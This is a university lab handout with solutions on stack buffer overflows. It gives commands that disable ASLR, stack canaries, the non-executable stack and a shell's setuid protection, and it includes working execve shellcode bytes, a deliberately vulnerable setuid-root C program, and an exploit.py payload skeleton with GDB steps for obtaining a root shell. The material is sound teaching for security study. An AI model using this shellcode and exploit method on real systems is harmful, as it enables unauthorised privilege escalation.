CITS3007 lab 5 (week 6) – Buffer overflows – solutions
It’s recommended you complete this lab in pairs, if possible, and discuss your results with your partner.
The objective of this lab is to gain insight into buffer overflow vulnerabilities
and see how they can be exploited. You will be given a
setuid
program with a buffer overflow vulnerability, and
your task is to develop a scheme to exploit the vulnerability and gain
root privileges.
Completing this lab requires you to have root access to the Linux kernel of the VM (or other machine) you’re running on. Otherwise, the command
sudo sysctl -w kernel.randomize_va_space=0
(in section 1.1, Turning off countermeasures) will fail. Furthermore, the shellcode used in this lab contains machine-code instructions specific to the x86-64 architecture.
Consequently, you will not be able to complete the lab using any of the following methods:
The GitPod environment does not give you root access to the kernel; while using GitPod, you are running within a security-restricted Docker container within a VM, and will be unable to change the way the kernel is running.
If you are using a VM with some architecture other than x86-64 (for instance, ARM64): exercises that involve injecting shellcode will only work on the x86-64 platform, because the machine instructions contained in the shellcode are specific to that architecture. If you normally use a VM with some other architecture, then to complete shellcode exercises, you will have to switch to a VM that uses an x86-64 architecture.
The preferred way of completing this lab is by using Vagrant (as outlined in Lab 1) to run the standard CITS3007 development environment image from VirtualBox. Within that VM, you have root access to the kernel, and all commands should complete successfully. If you use some other method, the commands might work, but it’s not guaranteed.
Modern operating systems implement several security mechanisms to make buffer overflow attacks more difficult. To simplify our attacks, we need to disable them first. It’s worth understanding what these protections are, because even though they are enabled in (for instance) modern Linux systems, embedded systems (and some other cut-down or minimal operating systems) may still be vulnerable.
Ubuntu and several other Linux-based systems use address space randomization to randomize the starting addresses of the heap and stack. This makes guessing exact addresses difficult. This feature can be disabled by running the following command in the CITS3007 development environment:
$ sudo sysctl -w kernel.randomize_va_space=0
This information isn’t essential to the lab, but may be helpful in understanding what’s going on here.
The sysctl
command (documented at man 8 sysctl
) alters the parameters
of a running Linux kernel. (The sysctl
command should not
be confused with the annoyingly similarly named systemctl
command, which has to do with starting and stopping daemon programs on a
system.)
The current value of the randomize_va_space
(“randomize
virtual address space”) kernel parameter can be displayed by running the
command:
$ cat /proc/sys/kernel/randomize_va_space
The result is a number, 0, 1 or 2, with the following meanings:
0: no randomization.
1: conservative randomization; the stack, mmap(), VDSO and heap are randomized.
2: full randomization; in addition to the above, memory managed through brk() is also randomized.
(The brk() system call, documented at man 2 brk, adjusts the size of the heap; it’s one of the system calls typically used by malloc to allocate memory on the heap.)
We use the sysctl
command to set this parameter to
0.
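As a rough illustration of the check described above, the following Python sketch reads the parameter from /proc and prints a short description of it. The function names and the wording of the descriptions are our own (they summarise the Linux kernel's sysctl documentation), and the script only reads the setting; changing it still requires the sysctl command.

```python
from pathlib import Path

# Short descriptions of each value (our own summary of the kernel docs).
ASLR_MEANINGS = {
    0: "no randomization",
    1: "conservative randomization",
    2: "full randomization (memory managed through brk() is also randomized)",
}


def describe_aslr(value: int) -> str:
    """Return a human-readable description of a randomize_va_space value."""
    return ASLR_MEANINGS.get(value, f"unrecognised value {value}")


def read_aslr_setting(path: str = "/proc/sys/kernel/randomize_va_space"):
    """Return the current setting as an int, or None if it cannot be read."""
    try:
        return int(Path(path).read_text().strip())
    except (OSError, ValueError):
        return None


if __name__ == "__main__":
    setting = read_aslr_setting()
    if setting is None:
        print("could not read the setting (is this a Linux system?)")
    else:
        print(f"randomize_va_space = {setting}: {describe_aslr(setting)}")
```

For this lab, the script should report a value of 0 once the sysctl command has been run.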
/bin/sh
In recent versions of Ubuntu OS, /bin/sh
is a symbolic
link pointing to the /bin/dash
shell: run
ls -al /bin/sh
to see this.
The Dash program (as well as Bash) implements a countermeasure that prevents it from being executed in a setuid process. If the shell detects that the effective user ID differs from the real user ID (see the previous lab), it will immediately change the effective user ID back to the real user ID, essentially dropping the privilege.
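The comparison the shell makes can be sketched in a few lines of Python. This is a simplified illustration only: the function name is hypothetical, and the real check is implemented in C inside the shell, with details we don't reproduce here.

```python
import os


def shell_would_drop_privileges(real_uid: int, effective_uid: int) -> bool:
    """Simplified model of the countermeasure: privileges are dropped
    whenever the effective user ID differs from the real user ID."""
    return real_uid != effective_uid


if __name__ == "__main__":
    ruid, euid = os.getuid(), os.geteuid()
    print(f"real uid = {ruid}, effective uid = {euid}")
    print("would drop privileges:", shell_would_drop_privileges(ruid, euid))
```

Run from an ordinary (non-setuid) process, the two IDs match, so nothing would be dropped. Inside a root-owned setuid program started by a normal user, the effective ID is 0 while the real ID is not, which is the case the countermeasure targets.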
For these exercises, our victim program is a setuid
program, and our attack relies on running /bin/sh
, so the
countermeasure in /bin/dash
makes our attack more
difficult. Therefore, we will link /bin/sh
to
zsh
instead, a shell which lacks such protection (though
with more effort, the countermeasure in /bin/dash
can be
defeated – you might like to try doing so as a challenge task). Inside
the development environment VM, install the zsh
package
with the command
sudo apt-get update && sudo apt-get install -y zsh
,
then run the following command to link /bin/sh
to
zsh
:
$ sudo ln -sf /bin/zsh /bin/sh
You can confirm that you’ve done this correctly by running the command:
$ sh --version
If all is working as expected, it should display:
zsh 5.8 (x86_64-ubuntu-linux-gnu)
When the program runs, the memory segment containing the stack can be
marked non-executable. This feature can be turned off during
compilation, by passing the option “-z execstack
” to
gcc
. This option is passed onto the linker,
ld
, and marks the output binary as requiring an
executable stack.
This option is documented in man ld
, and we will discuss
it further when compiling our programs.
The GCC compiler can include code in a compiled program which inserts stack canaries in the stack frames of a running program, and before returning from a function, checks that the canary is unaltered.
A RedHat article on compiler stack
protection flags outlines the flags which enable stack canaries in
GCC; we will use the -fno-stack-protector
flag to ensure
they’re disabled. (Further documentation on these options is available
in the GCC
manual.) We discuss this option further when compiling our
programs.
Shellcode is a small portion of code that launches a shell, and is widely used in code injection attacks. The aim is to inject code into the running process that will allow us to exploit the system. In the buffer overflow attack we launch in this lab, we’ll write that code – which is just a sequence of bytes – into a location on the stack, and try to convince the target program to execute it.
Represented in C, a piece of shellcode might look like the following:
// shellcode.c
#include <stdio.h>
#include <unistd.h>   // declares execve()
int main(void) {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
}
Read about the Linux execve
system call by typing man execve
;
it allows us to execute a program from C code. The name
array is effectively a list of pointers-to-char
, with a
NULL
pointer used to mark the end of the list.
However, we can’t straightforwardly use GCC to obtain our shellcode.
Recall that shellcode is a small sequence of bytes that we want
to inject into a target process. Try saving the above code as
shellcode.c
, and compile it with
make shellcode.o shellcode
. Examine the size of the
compiled program with
$ du -sk shellcode
and you will see that the compiled binary is about 20 kilobytes – far
too big and unwieldy for our purposes. (Once preprocessing is done on
the C code with cpp
, and all header files and their
definitions are included, the resulting code is a lot bigger than the 9
lines above would suggest. Read here
about one user’s attempts to get the smallest possible “Hello world”
program using GCC.)
Instead, the easiest way to construct shellcode is to write it in assembly language.1 The Intel 32-bit assembly code equivalent for the above C code would be something like the following (which you are not required to understand, but is presented here for interest):
; Store the command on stack
xor eax, eax
push eax
push "//sh"
push "/bin"
mov ebx, esp ; ebx --> "/bin//sh": execve()'s 1st argument
; Construct the argument array argv[]
push eax ; argv[1] = 0
push ebx ; argv[0] --> "/bin//sh"
mov ecx, esp ; ecx --> argv[]: execve()'s 2nd argument
; For environment variable
xor edx, edx ; edx = 0: execve()'s 3rd argument
; Invoke execve()
xor eax, eax ;
mov al, 0x0b ; execve()'s system call number
int 0x80
A brief explanation of the code (again, you’re not required to understand this in detail) is:
The "//sh" and "/bin" strings are pushed onto the stack (lines 1–5), after a zero word that terminates the string.
We need to pass three arguments to execve() via the ebx, ecx and edx registers,2 respectively. The majority of the shellcode basically constructs the content for these three arguments.
The final three instructions (xor eax, eax; mov al, 0x0b; int 0x80) are where we make the execve system call – that is, we request a service from the kernel. The kernel expects us to put a number identifying the system call we’re after (in this case, execve) into the al register, and then notify the kernel by invoking an “interrupt”.
So, we need to know what the system call number for
execve
is – it is 0x0b
. (A list of all the
system calls and their numbers is found in a Linux header called
unistd_32.h
, usually found at
/usr/include/x86_64-linux-gnu/asm/unistd_32.h
. On Ubuntu,
this file will only exist if you’ve installed the package
linux-libc-dev
.)
We set al
to 0x0b
(al
represents the lower 8 bits of the eax
register), and then
execute the instruction “int 0x80”
.
The int
instruction generates a call to an interrupt
handler – a bit like an exception handler – and the
0x80
in int 0x80
identifies a specific bit of
kernel handler code which exists to handle system calls.
That handler will look in register al
(part of the
eax
register) to find out what system call we want to
execute, and in registers ebx
, ecx
and
edx
for the arguments to that system call.
If you’re interested in further details on programming in x86
assembly, this guide
from the University of Virginia gives more details, such as how the
push
instruction works with the hardware-supported call
stack.
Another useful reference is the Wikibook on x86 Assembly.
We won’t do it in this lab, but the assembly code above can be
assembled using nasm
, an
assembler for the x86 CPU architecture. nasm
would compile
the above assembly into an object file (called, say,
sploit.o
), and that resulting object file contains the
exact sequence of bytes we need to insert in order to invoke
/bin/sh
. The following table is an extract from a compiled
object file produced by nasm
,3 and
shows that just 27 bytes (hex 0x1b
) are needed – these 27
bytes will have the same effect as the 20KB executable compiled from
shellcode.c
. The leftmost column shows offsets in hex, the
second column the exact byte values we want, and the last column the
corresponding assembly code:
off bytes assembly code
---------------------------------------------------
0: 31 c0 xor eax,eax
2: 50 push eax
3: 68 2f 2f 73 68 push 0x68732f2f
8: 68 2f 62 69 6e push 0x6e69622f
d: 89 e3 mov ebx,esp
f: 50 push eax
10: 53 push ebx
11: 89 e1 mov ecx,esp
13: 31 d2 xor edx,edx
15: 31 c0 xor eax,eax
17: b0 0b mov al,0xb
19: cd 80 int 0x80
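To make the table a little more concrete, the sketch below rebuilds the byte sequence in Python from the "bytes" column, prints its total length so it can be checked against the offsets in the table, and decodes the two pushed constants. The variable names are our own. Because x86 is little-endian, each 32-bit constant is stored low byte first, which is why 0x68732f2f reads as "//sh" in memory.

```python
import struct

# Bytes copied from the "bytes" column of the table, one instruction per line.
shellcode = bytes.fromhex(
    "31c0"        # xor eax,eax
    "50"          # push eax
    "682f2f7368"  # push 0x68732f2f
    "682f62696e"  # push 0x6e69622f
    "89e3"        # mov ebx,esp
    "50"          # push eax
    "53"          # push ebx
    "89e1"        # mov ecx,esp
    "31d2"        # xor edx,edx
    "31c0"        # xor eax,eax
    "b00b"        # mov al,0xb
    "cd80"        # int 0x80
)

# Pack the two immediates as little-endian 32-bit values, as the CPU stores them.
first_push = struct.pack("<I", 0x68732F2F)
second_push = struct.pack("<I", 0x6E69622F)

print("length in bytes:", len(shellcode))
print("pushed strings: ", first_push, second_push)
print("contains a zero byte:", 0 in shellcode)
```

The last check is worth noticing: the sequence contains no zero bytes, which matters when the bytes are later copied with a string function such as strcpy() that stops at the first zero byte.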
Download the file bufoverflow-code.zip
into the VM (you can use the command
wget https://cits3007.github.io/labs/bufoverflow-code.zip
)
and unzip it.
cd
into the shellcode
directory, and take a
look at call_shellcode.c
(reproduced below):
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
// Binary code for setuid(0)
// 64-bit: "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05"
// 32-bit: "\x31\xdb\x31\xc0\xb0\xd5\xcd\x80"
const char shellcode[] =
#if __x86_64__
"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e"
"\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57"
"\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05"
#else
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
"\xd2\x31\xc0\xb0\x0b\xcd\x80"
#endif
;
int main(int argc, char **argv)
{
    char code[500];
    strcpy(code, shellcode);
    int (*func)() = (int(*)())code;
    func();
    return 1;
}
The purpose of this program is to demonstrate that our shellcode
byte-sequence does indeed invoke the shell /bin/sh
.
The byte sequences are stored in the array shellcode
–
observe that the 32-bit version starts with “\x31\xc0\x50
”,
which is the byte sequence we get from compiling our assembly code.
What about the line “int (*func)() = (int(*)())code;”? The syntax C uses for this is unfortunately a bit obscure – but the gist of it is that we are saying “Declare func to be a pointer to some function (i.e., a blob of executable code sitting in memory), and point it at the address of the array code”. Usually, the bytes sitting in code would not be executable, because they are part of the call stack; but in our Makefile we pass the option “-z execstack” to GCC, which says to make the stack memory segment executable. The following statement, “func();”, then invokes that function pointer, just as if it were a normal function, and that will execute the code.
Discuss with your lab partner what is happening here; ask the lab facilitator for an explanation if you’re not sure.
We won’t need to use function pointers elsewhere in the unit, but they do come in handy when trying to exploit or reverse engineer existing binaries.
The exact details of what we are doing are as follows.
The line “int (*func)() = (int(*)())code;” declares func as a pointer to a function, and points it at the start of the code buffer. (When we use the variable code, it “decays” from being a char array into a char *. The char * type gives us a way of viewing or writing raw memory. Strictly speaking, the C standard does not define the result of converting an object pointer such as char * into a function pointer, but GCC on Linux permits the cast, and that is what we rely on here.)
We cast the address of code
into the type we want by
putting (int(*)())
in front of it; that says the type to
convert to is “pointer to a function which takes no arguments and
returns an int
”. (Is that obvious from the declaration?
Probably not. Function pointer declarations in C are rather cryptic, and
have to be read “from
the inside out”. Alternatively, as a shortcut, you can paste a
declaration into https://cdecl.org, and it will attempt to give you an
“English translation” of what the declaration means.)
So: when the function pointer func is invoked (by the statement “func();”), the instructions sitting in code will be executed.
The code above includes two copies of the shellcode – one is 32-bit
and the other is 64-bit. When we compile the program using the -m32
flag, the 32-bit version will be used; without this flag, the 64-bit
version will be used. Using the provided Makefile, you can compile the
code by typing make
. Two binaries will be created,
a32.out
(32-bit) and a64.out
(64-bit). Run
them and describe your observations. As noted above, the compilation
uses the execstack
option, which allows code to be executed
from the stack; without this option, the program will fail. Try deleting
the flags “-z execstack
” from the makefile and compile and
run the programs again – what happens?
Sample solutions
If the “-z execstack
” options are removed, then running
the compiled programs – which try to execute instructions in a
non-executable segment of memory – results in a segmentation fault, and
the program aborts.
The vulnerable program used in this lab is called
stack.c
, which is in the code
folder from the
zip file. This program has a buffer overflow vulnerability, and your job
is to exploit this vulnerability and gain root privileges. The essential
parts are shown below (some inessential functions have been
omitted):
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#ifndef BUF_SIZE
#define BUF_SIZE 100
#endif
int bof(char *str) {
    char buffer[BUF_SIZE];
    // The following statement has a buffer overflow problem
    strcpy(buffer, str);
    return 1;
}
int main(int argc, char **argv) {
    char str[517];
    FILE *badfile;
    badfile = fopen("badfile", "r");
    if (!badfile) {
        perror("Opening badfile"); exit(1);
    }
    int length = fread(str, sizeof(char), 517, badfile);
    printf("Input size: %d\n", length);
    bof(str);
    fprintf(stdout, "==== Returned Properly ====\n");
    return 1;
}
The above program has a buffer overflow vulnerability. It first reads
an input from a file called badfile
, and then passes this
input to another buffer in the function bof()
. The original
input can have a maximum length of 517 bytes, but the buffer in
bof()
is only BUF_SIZE
bytes long, which is
less than 517. Because strcpy()
does not check boundaries,
buffer overflow will occur.
Since this program is a root-owned setuid
program, if a
normal user is able to exploit this vulnerability, the user may be able
to get a root shell. Note that the program gets its input from a file
called badfile
, which is under users’ control. Your
objective is to create the contents for badfile
, such that
when the vulnerable program copies the contents into its buffer, a root
shell can be spawned.
To compile the above vulnerable program, do not forget to turn off
the stack canaries and the non-executable stack protections using the
-fno-stack-protector
and “-z execstack
”
options.
After compilation, we need to make the program a root-owned
setuid
program. We can achieve this by first changing the
ownership of the program to root, and then changing the permission to
4755
to enable the setuid
bit:
$ gcc -DBUF_SIZE=100 -m32 -o stack -z execstack -fno-stack-protector stack.c
$ sudo chown root stack
$ sudo chmod 4755 stack
It should be noted that changing ownership must be done before
turning on the setuid
bit, because ownership change will
cause the setuid
bit to be turned off.
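If you want to confirm that both steps took effect, one option is to inspect the file's owner and mode bits. The sketch below does this in Python using the standard os and stat modules; the helper names are our own, and the path in the usage example is just the binary name used in this lab.

```python
import os
import stat


def has_setuid_bit(mode: int) -> bool:
    """True if the setuid bit (octal 4000) is set in a file mode."""
    return bool(mode & stat.S_ISUID)


def is_root_owned_setuid(path: str) -> bool:
    """True if the file at `path` is owned by root and has the setuid bit set."""
    info = os.stat(path)
    return info.st_uid == 0 and has_setuid_bit(info.st_mode)


if __name__ == "__main__":
    target = "stack"  # assumed to be in the current directory
    if os.path.exists(target):
        print(target, "is root-owned setuid:", is_root_owned_setuid(target))
    else:
        print(target, "not found; compile it first")
```

Mode 4755 has the setuid bit set, whereas plain 755 does not, so running chown after chmod (which clears the bit) would make the check report False.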
The compilation and setup commands are already included in Makefile,
so we just need to type make
to execute those commands. The
variables L1, …, L4 are set in Makefile; they will be used during the
compilation.
Typing make
should result in output like the
following:
gcc -DBUF_SIZE=100 -z execstack -fno-stack-protector -m32 -o stack-L1 stack.c
gcc -DBUF_SIZE=100 -z execstack -fno-stack-protector -m32 -g -o stack-L1-dbg stack.c
sudo chown root stack-L1 && sudo chmod 4755 stack-L1
gcc -DBUF_SIZE=160 -z execstack -fno-stack-protector -m32 -o stack-L2 stack.c
gcc -DBUF_SIZE=160 -z execstack -fno-stack-protector -m32 -g -o stack-L2-dbg stack.c
sudo chown root stack-L2 && sudo chmod 4755 stack-L2
gcc -DBUF_SIZE=200 -z execstack -fno-stack-protector -o stack-L3 stack.c
gcc -DBUF_SIZE=200 -z execstack -fno-stack-protector -g -o stack-L3-dbg stack.c
sudo chown root stack-L3 && sudo chmod 4755 stack-L3
gcc -DBUF_SIZE=10 -z execstack -fno-stack-protector -o stack-L4 stack.c
gcc -DBUF_SIZE=10 -z execstack -fno-stack-protector -g -o stack-L4-dbg stack.c
sudo chown root stack-L4 && sudo chmod 4755 stack-L4
The following executables should get built:
stack-L1 stack-L1-dbg
stack-L2 stack-L2-dbg
stack-L3 stack-L3-dbg
stack-L4 stack-L4-dbg
The level 1 (“L1”) programs should be the easiest to exploit, and are the ones we use in this lab; and for each level, the ones with debugging symbols enabled (“-dbg”) should be very straightforward to exploit.
If you are able to successfully exploit the stack-L1-dbg
and stack-L1
programs, then for a challenge, you might like
to try exploiting the L2, L3 and L4 programs.
To exploit the buffer-overflow vulnerability in the target program, the most important thing to know is the distance between the buffer’s starting position and the place where the return-address is stored. We will use a debugging method to find it out. Since we have the source code of the target program, we can compile it with the debugging flag turned on. That will make it more convenient to debug.
We will add the -g
flag to the gcc
command,
so debugging information is added to the binary. If you run
make
, the debugging version is already created. We will use
GDB to debug stack-L1-dbg
. We need to create a file called
badfile
before running the program.
$ touch badfile # Create an empty badfile
$ gdb stack-L1-dbg # start gdb
When you run a program in GDB, ASLR gets temporarily turned off. (If you already disabled ASLR using the sysctl command, as described under “Turning off countermeasures”, then obviously this won’t make any difference. But on systems that do have ASLR enabled, this explains why the addresses you see in GDB can differ from the addresses found in a normally-running program.)
It’s not necessary for you to know the details of how this is done;
but if you’re interested, take a look at man 2 personality
.
On Linux, calling personality(ADDR_NO_RANDOMIZE)
changes
how the stack and heap will be laid out in memory. Then, one can call fork()
and one of the exec
functions to launch a new process in which ASLR is disabled.
Within GDB, run the commands:
(gdb) b bof
(gdb) run
(gdb) next
(gdb) print $ebp
(gdb) print &buffer
(gdb) quit
This will set a breakpoint at the function bof() and run the program. We stop at the bof function and step to the strcpy call.
The ebp
register is used at runtime to point to the
“start” (high-memory end) of the current stack frame. When GDB stops
“inside” the bof()
function, it actually stops
before the ebp
register is set to point to the
current stack frame, so if we print out the value of ebp here, we will
get the caller’s ebp
value. We need to use
next
to execute a few instructions and stop after the
ebp
register is modified to point to the stack frame of the
bof()
function.
It should be noted that the frame pointer value obtained from GDB is different from that during the actual execution (without using GDB). This is because GDB has pushed some environment data into the stack before running the debugged program. When the program runs directly without using GDB, the stack does not have that data, so the actual frame pointer value will be larger. You should keep this in mind when constructing your payload.
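Once GDB has printed the value of ebp and the address of buffer, the distance to the saved return address is simple arithmetic: in a conventional 32-bit stack frame, the saved ebp sits at the address held in ebp, and the return address sits in the next word above it. The sketch below works through this with made-up numbers. Both addresses are hypothetical placeholders, not the values you will see, so substitute your own GDB output.

```python
def return_address_offset(ebp: int, buffer_addr: int, word_size: int = 4) -> int:
    """Distance in bytes from the start of the buffer to the saved return address.

    Assumes a conventional frame layout: the saved frame pointer is stored
    at address `ebp`, and the return address immediately above it.
    """
    if buffer_addr >= ebp:
        raise ValueError("expected the buffer to sit below ebp on the stack")
    return (ebp - buffer_addr) + word_size


# Hypothetical values standing in for the output of
# "print $ebp" and "print &buffer" (yours will differ).
ebp = 0xFFFFCEB8
buffer_addr = 0xFFFFCE4C

print(return_address_offset(ebp, buffer_addr))  # 112
```

With these placeholder values, the buffer starts 108 bytes below ebp, so the return address would begin 112 bytes after the start of the buffer.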
A register
is a quickly accessible location available to a CPU. You can think of it
as being a size_t
cell of memory hanging directly off the
CPU. (Often, the CPU will also provide ways of referring to just
part of a register, as well. For instance, there may be a name
by which you can refer to just the 8 lowest (char
-sized)
bits of some register.) Instead of having memory addresses,
like locations in RAM, they have names – for instance,
eax
, ebx
, ecx
, edx
,
and so on. As a program executes, data from RAM will often be loaded
into the processor’s registers so it can be operated on.
On 32-bit Intel machines, some of the registers have special purposes.
The eip
register: this is the “Extended Instruction
Pointer” register (or just “Instruction Pointer”) – it keeps track of
what instruction should be executed next.
When a function is called – and a new stack frame gets pushed onto
the call stack – the value of the eip
register needs to be
saved somewhere in the stack frame, so that when the current
function returns, we know what instruction to execute
afterwards.
The ebp
register: this is used to hold the “base
pointer” for the current stack frame. As the stack frame is being set
up, ebp
will be used to store a “start” or “base” point for
the stack frame, and the location of variables will be calculated
relative to the value of ebp
.
On GCC, it’s possible to use the function
__builtin_frame_address()
to get the value of the
ebp
register (see https://gcc.gnu.org/onlinedocs/gcc/Return-Address.html).
The esp register: the stack pointer. This points to the top of the stack, that is, the lowest address currently in use in the current stack frame; new local variables are allocated below it. As a stack frame is being set up, this starts off being equal to the ebp register. As memory is allocated for local variables, the esp register will get decremented.
(Diagram of x86 registers from University of Virginia cs216 x86 Assembly Guide by David Evans.)
To exploit the buffer overflow vulnerability in the target program,
we need to prepare a payload, and save it inside badfile
.
We will use a Python program to do that. (You won’t need any extensive
knowledge of Python for this lab, since you’ll just be making minor
alterations to an existing script. But if you are not familiar with
Python and would like a tutorial on it, Google
provides a helpful one.) We provide a skeleton program called
exploit.py
, which is included in the lab zip file. The code
is incomplete, and you will need to replace some of the essential values
in the code (marked with an XXX
):
#!/usr/bin/python3
import sys
# XXX - replace the content with the actual shellcode
shellcode= (
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
).encode('latin-1')
# Fill the content with NOP's
content = bytearray(0x90 for i in range(517))
##################################################################
# Put the shellcode somewhere in the payload
start = 0 # XXX - change this number
content[start:start + len(shellcode)] = shellcode
# Decide the return address value
# and put it somewhere in the payload
ret = 0x00 # XXX - change this number
offset = 0 # XXX - change this number
L = 4 # Use 4 for 32-bit address and 8 for 64-bit address
content[offset:offset + L] = (ret).to_bytes(L,byteorder='little')
##################################################################
# Write the content to a file
with open('badfile', 'wb') as f:
    f.write(content)
You will need to change the exploit.py code to:
Replace the placeholder contents of shellcode with the actual shellcode. (Currently, shellcode just contains do-nothing, “no-op” instructions – these are a bit like writing semicolons without a statement in C, or pass statements in Python.)
Change the start variable (marked XXX). This specifies at exactly what offset in badfile the shellcode bytes are inserted.
Change the ret variable and the offset variable (both marked XXX). offset specifies a place in badfile where we want to insert an “address to return to”, and ret is that address.
Running exploit.py will generate a file badfile. Then run the vulnerable program stack.
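To show how the three values fit together, here is a sketch that wraps the payload construction in a function and adds a few sanity checks. It is not the lab's answer: the shellcode is a placeholder, and the start, ret and offset values in the usage example are made up for illustration. The function name and the checks are our own additions. One check is worth noting: strcpy() stops copying at the first zero byte, so a 32-bit return address containing a zero byte would cut the copy short.

```python
NOP = 0x90          # x86 "no operation" instruction
PAYLOAD_SIZE = 517  # number of bytes stack.c reads from badfile
ADDR_LEN = 4        # 32-bit target, as for stack-L1


def build_payload(shellcode: bytes, start: int, ret: int, offset: int) -> bytes:
    """Return PAYLOAD_SIZE bytes of NOPs, with `shellcode` placed at `start`
    and the little-endian address `ret` placed at `offset`."""
    if start < 0 or start + len(shellcode) > PAYLOAD_SIZE:
        raise ValueError("shellcode does not fit in the payload")
    if offset < 0 or offset + ADDR_LEN > PAYLOAD_SIZE:
        raise ValueError("return address does not fit in the payload")
    if start < offset + ADDR_LEN and offset < start + len(shellcode):
        raise ValueError("shellcode and return address overlap")
    ret_bytes = ret.to_bytes(ADDR_LEN, byteorder="little")
    if 0 in ret_bytes:
        # strcpy() stops at the first zero byte; nothing after it is copied.
        raise ValueError("return address contains a zero byte")
    content = bytearray([NOP] * PAYLOAD_SIZE)
    content[start:start + len(shellcode)] = shellcode
    content[offset:offset + ADDR_LEN] = ret_bytes
    return bytes(content)


# Hypothetical values, for illustration only; they are NOT the lab's answers.
placeholder_shellcode = b"\xcc" * 8
payload = build_payload(
    placeholder_shellcode,
    start=PAYLOAD_SIZE - len(placeholder_shellcode),  # shellcode at the very end
    ret=0xFFFFCF20,  # made-up address somewhere among the NOPs
    offset=112,      # made-up distance from buffer start to return address
)
print(len(payload), payload[112:116].hex())
```

Placing the shellcode at the end of the payload leaves a long run of NOPs before it, so the return address only has to land somewhere in that run rather than on the exact first byte of the shellcode.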
Here is what we’re ultimately aiming for: if you manage to implement
the exploit correctly, you should be able to get a root shell by
creating badfile
and running the stack-L1
program:
$ ./exploit.py # create the badfile
$ ./stack-L1 # launch the attack by running the vulnerable program
# <---- Bingo! You’ve got a root shell!
However, working out what values to insert in our
exploit.py
script at start
, ret
and offset
will take some experimentation, which we’ll look
at in the following section. (By the way: if you do get the exploit
working – try running the command id
to confirm you are
root. If you’ve successfully become root, the id
command
will say that your user ID is 0.)
The following section gives some suggestions on how to identify the
values that should go in the XXX
parts of
exploit.py
.
You may want to work through that section, and then try a fairly easy
exercise – can you craft a badfile
which will give you root
access when ./stack-L1-dbg
is run?
Then try customizing the values in exploit.py
so that
you can exploit ./stack-L1
. It will require slightly
different values from ./stack-L1-dbg
. How can you find
them?
Your lab facilitator may have some hints.
It can be helpful to try and orient yourself while using GDB, and work out where different parts of the stack are. In this section, we show some commands you can run to find their locations.
It can be helpful to get an overall picture of how memory is laid out in the vulnerable program – we outline two ways of doing it.
While you have the stack-L1-dbg
program stopped at a
breakpoint in GDB, open another terminal session and ssh
into the VM so you can run ps -af | grep stack-L1-dbg
.
You should see something like the following:
$ ps -af | grep stack-L1-dbg
vagrant 1355 1340 0 02:43 pts/1 00:00:00 gdb ./stack-L1-dbg
vagrant 1357 1355 0 02:43 pts/1 00:00:00 /home/vagrant/lab04-code/code/stack-L1-dbg
vagrant 1362 1246 0 02:44 pts/0 00:00:00 grep --color=auto stack-L1-dbg
Here, the second line shows the (currently stopped)
stack-L1-dbg
process; the second column is the process
ID. If you run cat /proc/process_id/maps
(replacing process_id with the process ID of the
stack-L1-dbg
process), you should get output like the
following:
56555000-56558000 r-xp 00000000 fc:03 393228 /home/vagrant/lab04-code/code/stack-L1-dbg
56558000-56559000 r-xp 00002000 fc:03 393228 /home/vagrant/lab04-code/code/stack-L1-dbg
56559000-5655a000 rwxp 00003000 fc:03 393228 /home/vagrant/lab04-code/code/stack-L1-dbg
5655a000-5657c000 rwxp 00000000 00:00 0 [heap]
f7dd5000-f7fba000 r-xp 00000000 fc:03 1847105 /usr/lib32/libc-2.31.so
f7fba000-f7fbb000 ---p 001e5000 fc:03 1847105 /usr/lib32/libc-2.31.so
f7fbb000-f7fbd000 r-xp 001e5000 fc:03 1847105 /usr/lib32/libc-2.31.so
f7fbd000-f7fbe000 rwxp 001e7000 fc:03 1847105 /usr/lib32/libc-2.31.so
f7fbe000-f7fc1000 rwxp 00000000 00:00 0
f7fcb000-f7fcd000 rwxp 00000000 00:00 0
f7fcd000-f7fd0000 r--p 00000000 00:00 0 [vvar]
f7fd0000-f7fd1000 r-xp 00000000 00:00 0 [vdso]
f7fd1000-f7ffb000 r-xp 00000000 fc:03 1847101 /usr/lib32/ld-2.31.so
f7ffc000-f7ffd000 r-xp 0002a000 fc:03 1847101 /usr/lib32/ld-2.31.so
f7ffd000-f7ffe000 rwxp 0002b000 fc:03 1847101 /usr/lib32/ld-2.31.so
fffdd000-ffffe000 rwxp 00000000 00:00 0 [stack]
This gives you a picture of the process’s virtual memory4 – memory addresses are in the
leftmost column, with permissions for each memory segment
(e.g. read, write and
execute) in the second column. In the output above, the
actual program instructions of stack-L1-dbg
– the “text
segment” – are in the addresses 0x56555000
to
0x5655a000
(lines 1–3). Back in GDB, if you ask for the
memory address of the instructions of the main
routine, you
should get an address in that range:
(gdb) print main
$1 = {int (int, char **)} 0x565562e0 <main>
The stack is in the range of addresses from
0xfffdd000
to 0xffffe000
.
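When you have several addresses to place, it can be convenient to let a script look them up in the maps output. The sketch below parses lines in the format shown above and reports which mapping contains a given address. The class and function names are our own, and the sample text is a three-line excerpt of the output above; the stack address in the example is an arbitrary value chosen to fall inside the [stack] range.

```python
from typing import List, NamedTuple, Optional


class Mapping(NamedTuple):
    start: int
    end: int
    perms: str
    name: str


def parse_maps_line(line: str) -> Mapping:
    """Parse one line of /proc/<pid>/maps into a Mapping."""
    fields = line.split(None, 5)
    start_text, end_text = fields[0].split("-")
    name = fields[5].strip() if len(fields) > 5 else ""
    return Mapping(int(start_text, 16), int(end_text, 16), fields[1], name)


def find_mapping(mappings: List[Mapping], address: int) -> Optional[Mapping]:
    """Return the mapping whose range contains `address`, or None."""
    for mapping in mappings:
        if mapping.start <= address < mapping.end:
            return mapping
    return None


sample = """\
56555000-56558000 r-xp 00000000 fc:03 393228 /home/vagrant/lab04-code/code/stack-L1-dbg
5655a000-5657c000 rwxp 00000000 00:00 0 [heap]
fffdd000-ffffe000 rwxp 00000000 00:00 0 [stack]
"""
mappings = [parse_maps_line(line) for line in sample.splitlines()]

for address in (0x565562E0, 0xFFFFCEC0):
    found = find_mapping(mappings, address)
    print(hex(address), "->", found.name if found else "not mapped")
```

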